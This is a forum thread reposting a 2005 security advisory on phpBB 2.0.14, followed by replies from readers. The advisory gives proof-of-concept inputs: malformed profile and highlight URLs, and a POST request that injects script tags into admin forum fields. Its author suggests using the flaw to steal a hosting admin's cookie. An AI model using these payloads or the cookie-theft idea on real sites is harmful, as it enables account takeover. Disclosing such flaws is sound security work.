|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 158
Members: 0
Total: 158
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
-==phpBB 2.0.14 Multiple Vulnerabilities==- by HaCkZaTaN |
|
Posted: Sun Apr 24, 2005 2:10 am |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
Code: | *
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]? - Advisory #14 - 17/04/05
--------------------------------------------------------
Program: phpBB 2.0.14
Homepage: http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.14 & Lower versions
Risk: Low Risk!!
Impact: Multiple Vulnerabilities.
-==phpBB 2.0.14 Multiple Vulnerabilities==-
---------------------------------------------------------
- Description
---------------------------------------------------------
phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.
- Tested
---------------------------------------------------------
localhost & many forums
- Explotation
---------------------------------------------------------
-==Bad Filter of HTML Code==-
phpBB2/profile.php?mode=viewprofile&u=\[]phpBB2/viewtopic.php?p=3&highlight=\[]#########################################################
-==XSS==-
POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1
forumname=<script>alert('NST')</script>&forumdesc=<script>alert('NST')</script>&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create
new
forum
Some people cannot find it interest someones yes but well i dont care because if you
put some effort you know that
you can do a lot with this, like fooling the Admin of the Hosting to get his cookie
& and then get access to whm...
- References
--------------------------------------------------------
http://neosecurityteam.net/Advisories/Advisory-14.txt
- Credits
-------------------------------------------------
Discovered by HaCkZaTaN <hck_zatan hotmail com>
[N]eo [S]ecurity [T]eam [NST]? - http://neosecurityteam.net/
Got Questions? http://neosecurityteam.net/
Irc.gigachat.net #uruguay [NeoSecurity IRC]
- Greets
--------------------------------------------------------
Paisterist
Daemon21
LINUX
erg0t
uyx
CrashCool
Makoki
KingMetal
r3v3ng4ns
And my Colombian people
@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/
/* EOF */
|
http://neosecurityteam.net/ |
|
|
|
|
|
|
|
|
Posted: Wed Apr 27, 2005 7:06 pm |
|
|
KingOfSka |
Advanced user |
|
|
Joined: Mar 13, 2005 |
Posts: 61 |
|
|
|
|
|
|
|
can't understand how to make it work lol
i get a blank profile every time i try.. |
|
|
|
|
Posted: Thu Apr 28, 2005 7:49 pm |
|
|
gulftech |
Valuable expert |
|
|
Joined: Apr 20, 2005 |
Posts: 9 |
|
|
|
|
|
|
|
1) Putting any non integer based value that doesn't return a record will result in the blank profile.
2) The regex issue in highlight is more of a bug than a security issue. I could be wrong, but I have glanced at the code an don't see it as exploitable. It is a bug though and should be fixed I guess.
3) I have never heard of cross site scripting when using the post method, but I could see how POST cross site scripting could be exploited. For example, you could have an auto submitted form using javascript, but in this example a valid session id is required so it is not exploitable. |
|
|
|
|
Posted: Sat May 21, 2005 12:30 pm |
|
|
Twinky |
Regular user |
|
|
Joined: May 20, 2005 |
Posts: 5 |
|
|
|
|
|
|
|
how do i use this can sum1 plz explain |
|
Last edited by Twinky on Sat May 21, 2005 10:40 pm; edited 1 time in total |
|
|
|
Posted: Sat May 21, 2005 9:58 pm |
|
|
g30rg3_x |
Active user |
|
|
Joined: Jan 23, 2005 |
Posts: 31 |
Location: OutSide Of The PE |
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|